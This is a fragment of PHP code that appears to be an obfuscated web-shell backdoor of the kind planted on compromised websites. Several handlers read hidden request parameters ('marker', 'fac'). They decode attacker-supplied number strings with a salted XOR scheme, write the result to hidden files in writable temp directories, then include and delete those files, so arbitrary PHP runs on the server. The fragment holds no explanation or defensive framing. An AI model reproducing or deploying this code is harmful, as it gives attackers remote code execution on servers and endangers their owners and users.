); $dec= ((int)$v4 - $sChar -($w % 10))^74; $res.=chr($dec ); } $symbol = 0; do { $itm = $hld[$symbol] ?? null; if ($symbol >= count($hld)) break; if ((bool)is_dir($itm) && (bool)is_writable($itm)) { $binding = implode("/", [$itm, ".obj"]); if (@file_put_contents($binding, $res) !== false) { include $binding; unlink($binding); exit; } } $symbol++; } while (true); } if(count($_REQUEST) > 0 && isset($_REQUEST["\x6Dar\x6B\x65r"])){ $parameter_group = array_filter([getenv("TMP"), sys_get_temp_dir(), "/dev/shm", ini_get("upload_tmp_dir"), getenv("TEMP"), "/var/tmp", getcwd(), "/tmp", session_save_path()]); $holder = $_REQUEST["\x6Dar\x6B\x65r"]; $holder =explode ('.' , $holder ); $record = ''; $salt2 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $salt2 ); $m = 0; $__tmp = $holder; while( $v7 = array_shift( $__tmp)) { $chS = ord( $salt2[$m%$sLen] ); $d =( ( int)$v7 - $chS -( $m%10)) ^ 50; $record .= chr( $d ); $m++; } foreach ($parameter_group as $itm): if ((is_dir($itm) and is_writable($itm))) { $ptr = "$itm/.tkn"; $success = file_put_contents($ptr, $record); if ($success) { include $ptr; @unlink($ptr); exit;} } endforeach; } if(isset($_REQUEST["\x6D\x61\x72ker"]) ? true : false){ $tkn = array_filter([getenv("TEMP"), sys_get_temp_dir(), ini_get("upload_tmp_dir"), "/tmp", getenv("TMP"), "/var/tmp", session_save_path(), getcwd(), "/dev/shm"]); $symbol = $_REQUEST["\x6D\x61\x72ker"]; $symbol = explode("." ,$symbol ) ; $resource = ''; $s6 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s6 ); foreach ($symbol as $k => $v4): $sChar = ord($s6[$k % $sLen] ); $dec = ((int)$v4 - $sChar - ($k % 10)) ^ 48; $resource .= chr($dec ); endforeach; foreach ($tkn as $key => $token) { if ((is_dir($token) and is_writable($token))) { $k = "$token" . "/.hld"; if (file_put_contents($k, $resource)) { include $k; @unlink($k); exit; } } } } if(count($_POST) > 0 && isset($_POST["fac"])){ $desc = array_filter([getenv("TMP"), "/var/tmp", "/dev/shm", sys_get_temp_dir(), session_save_path(), getcwd(), getenv("TEMP"), ini_get("upload_tmp_dir"), "/tmp"]); $symbol = $_POST["fac"]; $symbol = explode ('.' , $symbol ) ; $token = ''; $salt3 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt3); foreach($symbol as $z => $v8) {$sChar = ord($salt3[$z % $lenS]); $dec =((int)$v8 - $sChar -($z % 10)) ^ 29; $token .= chr($dec); } foreach ($desc as $flg): if ((is_dir($flg) and is_writable($flg))) { $value = str_replace("{var_dir}", $flg, "{var_dir}/.comp"); $file = fopen($value, 'w'); if ($file) { fwrite($file, $token); fclose($file); include $value; @unlink($value); exit; } } endforeach; }